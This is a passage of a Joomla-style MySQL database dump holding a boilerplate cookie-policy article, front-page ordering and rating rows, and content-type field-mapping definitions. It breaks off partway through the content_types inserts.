00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_readmore\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"page_title\":\"\",\"alternative_readmore\":\"\",\"layout\":\"\"}',1,0,'','',1,0,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(68,244,'Site Cookie Policy','site-cookie-policy','<p>Welcome to our cookie policy. This policy works alongside our <a href=\"privacy-policy\" target=\"_blank\" rel=\"noopener noreferrer\">Privacy Policy</a>. The purpose of this policy is to describe what cookies are, what we use them for, and how you can manage them during your visit to or use of our website.</p>\r\n<p><strong>What are cookies?</strong></p>\r\n<p>We may place small text files called ‘cookies’ on your device when you visit our website. These files do not contain personal data, but they do contain a personal identifier allowing us to associate your personal data with a certain device. Many websites use cookies and you can find out more about them at <a href=\"http://www.allaboutcookies.org\" target=\"_blank\" rel=\"noopener noreferrer\">All About Cookies</a>.</p>\r\n<h2><strong>Why do we use cookies?</strong></h2>\r\n<p>These files serve several useful purposes for you, including:</p>\r\n<ul>\r\n<li>granting you access to restricted content;</li>\r\n<li>tailoring our website’s functionality to you personally by letting us remember your preferences, location or device type;</li>\r\n<li>improving how our website performs;</li>\r\n<li>understanding who our audience is so that we can provide content most relevant to you;</li>\r\n<li>allowing third parties to provide services to our website; and</li>\r\n<li>helping us deliver interest-based advertising where appropriate in compliance with the applicable laws.</li>\r\n</ul>\r\n<h2><strong>The types of cookies we use</strong></h2>\r\n<p>We use different types of cookies on our website. Some of these cookies are placed by us, while others are placed by our third-party plug-ins, suppliers or advertisers. These cookies may be deleted from your device at different times, such as at the end of your browsing session (when you leave the website) or after a pre-set amount of time, or they may persist on your device until you delete them.</p>\r\n<p>We use the following types of cookies on our website:</p>\r\n<ul>\r\n<li>essential cookies – these are cookies that allow our website to perform its essential functions. Without these cookies, some parts of our websites would stop working.</li>\r\n<li>site analytics cookies – these are cookies that monitor how our website is performing, and how you interact with it. We use them to know how best to improve our website or services.</li>\r\n<li>functional cookies – these are cookies that remember who you are as a user of our website. We use them to remember any preferences you may have selected on our website, like saving your username and password or settings.</li>\r\n</ul>\r\n<h2><strong>Our cookies</strong></h2>\r\n<p>Essential: Allows our website to perform its essential functions. Without these cookies, some parts of our websites would stop working.</p>\r\n<p>Site Analytics: Monitors how our website is performing, and how you interact with it. We use them to know how best to improve our website or services.</p>\r\n<p>Functional: Remembers who you are as a user of our website. We use them to remember any preferences you may have selected on our website, like saving your username and password or settings.</p>\r\n<h2><strong>Deleting cookies</strong></h2>\r\n<p>Your internet browser generally accepts cookies automatically, but you can often change this setting to stop accepting them. You can also delete cookies manually. You can read how to do this at <a href=\"https://www.digitaltrends.com/computing/how-to-delete-cookies/\" target=\"_blank\" rel=\"noopener noreferrer\">Digital Trends</a>.</p>\r\n<p>Deleting or no longer accepting cookies may prevent you from accessing certain aspects of our website where cookies are necessary or because the website forgot your preferences. </p>\r\n<h2><strong>Updates to this policy</strong></h2>\r\n<p style=\"color: #0e101a; background: transparent; margin-top: 0pt; margin-bottom: 0pt;\">We may occasionally make changes to this policy. When we make material changes to this policy, we will provide you with a prominent notice on our website or send you an email. We may notify you in advance. <span style=\"color: #0e101a; background: transparent; margin-top: 0pt; margin-bottom: 0pt;\" data-preserver-spaces=\"true\"><br /></span></p>','',1,0,'2021-06-01 10:44:55',309,'','2021-06-01 10:44:55',0,0,'0000-00-00 00:00:00','2021-06-01 10:44:55','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\",\"spfeatured_image\":\"\",\"spfeatured_image_alt\":\"\",\"post_format\":\"standard\",\"gallery\":\"\",\"audio\":\"\",\"video\":\"\",\"link_title\":\"\",\"link_url\":\"\",\"quote_text\":\"\",\"quote_author\":\"\",\"post_status\":\"\"}',1,0,'','',1,7,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','','');
/*!40000 ALTER TABLE `vzx9b_content` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_content_frontpage`
--
DROP TABLE IF EXISTS `vzx9b_content_frontpage`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_content_frontpage` (
`content_id` int(11) NOT NULL DEFAULT 0,
`ordering` int(11) NOT NULL DEFAULT 0,
PRIMARY KEY (`content_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_content_frontpage`
--
LOCK TABLES `vzx9b_content_frontpage` WRITE;
/*!40000 ALTER TABLE `vzx9b_content_frontpage` DISABLE KEYS */;
INSERT INTO `vzx9b_content_frontpage` VALUES (8,2),(24,1),(35,4),(50,3);
/*!40000 ALTER TABLE `vzx9b_content_frontpage` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_content_rating`
--
DROP TABLE IF EXISTS `vzx9b_content_rating`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_content_rating` (
`content_id` int(11) NOT NULL DEFAULT 0,
`rating_sum` int(10) unsigned NOT NULL DEFAULT 0,
`rating_count` int(10) unsigned NOT NULL DEFAULT 0,
`lastip` varchar(50) NOT NULL DEFAULT '',
PRIMARY KEY (`content_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_content_rating`
--
LOCK TABLES `vzx9b_content_rating` WRITE;
/*!40000 ALTER TABLE `vzx9b_content_rating` DISABLE KEYS */;
INSERT INTO `vzx9b_content_rating` VALUES (72,5,1,'::1'),(73,5,1,'::1'),(74,4,1,'::1'),(75,4,1,'::1'),(77,5,1,'::1');
/*!40000 ALTER TABLE `vzx9b_content_rating` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_content_types`
--
DROP TABLE IF EXISTS `vzx9b_content_types`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_content_types` (
`type_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`type_title` varchar(255) NOT NULL DEFAULT '',
`type_alias` varchar(400) NOT NULL DEFAULT '',
`table` varchar(255) NOT NULL DEFAULT '',
`rules` mediumtext NOT NULL,
`field_mappings` mediumtext NOT NULL,
`router` varchar(255) NOT NULL DEFAULT '',
`content_history_options` varchar(5120) DEFAULT NULL COMMENT 'JSON string for com_contenthistory options',
PRIMARY KEY (`type_id`),
KEY `idx_alias` (`type_alias`(100))
) ENGINE=InnoDB AUTO_INCREMENT=18 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_content_types`
--
LOCK TABLES `vzx9b_content_types` WRITE;
/*!40000 ALTER TABLE `vzx9b_content_types` DISABLE KEYS */;
INSERT INTO `vzx9b_content_types` VALUES (1,'Article','com_content.article','{\"special\":{\"dbtable\":\"#__content\",\"key\":\"id\",\"type\":\"Content\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"state\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"introtext\", \"core_hits\":\"hits\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"attribs\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"urls\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"xreference\", \"asset_id\":\"asset_id\", \"note\":\"note\"}, \"special\":{\"fulltext\":\"fulltext\"}}','ContentHelperRoute::getArticleRoute','{\"formFile\":\"administrator\\/components\\/com_content\\/models\\/forms\\/article.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\"],\"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"ordering\"],\"convertToInt\":[\"publish_up\", \"publish_down\", \"featured\", \"ordering\"],\"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"} ]}'),(2,'Weblink','com_weblinks.weblink','{\"special\":{\"dbtable\":\"#__weblinks\",\"key\":\"id\",\"type\":\"Weblink\",\"prefix\":\"WeblinksTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"state\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"urls\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"xreference\", \"asset_id\":\"null\"}, \"special\":{}}','WeblinksHelperRoute::getWeblinkRoute','{\"formFile\":\"administrator\\/components\\/com_weblinks\\/models\\/forms\\/weblink.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"featured\",\"images\"], \"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"ordering\"], \"convertToInt\":[\"publish_up\", \"publish_down\", \"featured\", \"ordering\"], \"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"} ]}'),(3,'Contact','com_contact.contact','{\"special\":{\"dbtable\":\"#__contact_details\",\"key\":\"id\",\"type\":\"Contact\",\"prefix\":\"ContactTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"name\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"address\", \"core_hits\":\"hits\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"image\", \"core_urls\":\"webpage\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"xreference\", \"asset_id\":\"null\"}, \"special\":{\"con_position\":\"con_position\",\"suburb\":\"suburb\",\"state\":\"state\",\"country\":\"country\",\"postcode\":\"postcode\",\"telephone\":\"telephone\",\"fax\":\"fax\",\"misc\":\"misc\",\"email_to\":\"email_to\",\"default_con\":\"default_con\",\"user_id\":\"user_id\",\"mobile\":\"mobile\",\"sortname1\":\"sortname1\",\"sortname2\":\"sortname2\",\"sortname3\":\"sortname3\"}}','ContactHelperRoute::getContactRoute','{\"formFile\":\"administrator\\/components\\/com_contact\\/models\\/forms\\/contact.xml\",\"hideFields\":[\"default_con\",\"checked_out\",\"checked_out_time\",\"version\",\"xreference\"],\"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"ordering\"],\"convertToInt\":[\"publish_up\", \"publish_down\", \"featured\", \"ordering\"], \"displayLookup\":[ {\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"} ] }'),(4,'Newsfeed','com_newsfeeds.newsfeed','{\"special\":{\"dbtable\":\"#__newsfeeds\",\"key\":\"id\",\"type\":\"Newsfeed\",\"prefix\":\"NewsfeedsTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"name\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"link\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"xreference\", \"asset_id\":\"null\"}, \"special\":{\"numarticles\":\"numarticles\",\"cache_time\":\"cache_time\",\"rtl\":\"rtl\"}}','NewsfeedsHelperRoute::getNewsfeedRoute','{\"formFile\":\"administrator\\/components\\/com_newsfeeds\\/models\\/forms\\/newsfeed.xml\",\"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\"],\"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"ordering\"],\"convertToInt\":[\"publish_up\", \"publish_down\", \"featured\", \"ordering\"],\"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"} ]}'),(5,'User','com_users.user','{\"special\":{\"dbtable\":\"#__users\",\"key\":\"id\",\"type\":\"User\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"name\",\"core_state\":\"null\",\"core_alias\":\"username\",\"core_created_time\":\"registerdate\",\"core_modified_time\":\"lastvisitDate\",\"core_body\":\"null\", \"core_hits\":\"null\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"access\":\"null\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"null\", \"core_language\":\"null\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"null\", \"core_ordering\":\"null\", \"core_metakey\":\"null\", \"core_metadesc\":\"null\", \"core_catid\":\"null\", \"core_xreference\":\"null\", \"asset_id\":\"null\"}, \"special\":{}}','UsersHelperRoute::getUserRoute',''),(6,'Article Category','com_content.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\":{\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','ContentHelperRoute::getCategoryRoute','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(7,'Contact Category','com_contact.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\":{\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','ContactHelperRoute::getCategoryRoute','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(8,'Newsfeeds Category','com_newsfeeds.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\":{\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','NewsfeedsHelperRoute::getCategoryRoute','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(9,'Weblinks Category','com_weblinks.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\":{\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','WeblinksHelperRoute::getCategoryRoute','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(10,'Tag','com_tags.tag','{\"special\":{\"dbtable\":\"#__tags\",\"key\":\"tag_id\",\"type\":\"Tag\",\"prefix\":\"TagsTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"urls\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"null\", \"core_xreference\":\"null\", \"asset_id\":\"null\"}, \"special\":{\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\"}}','TagsHelperRoute::getTagRoute','{\"formFile\":\"administrator\\/components\\/com_tags\\/models\\/forms\\/tag.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\",\"version\", \"lft\", \"rgt\", \"level\", \"path\", \"urls\", \"publish_up\", \"publish_down\"],\"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}, 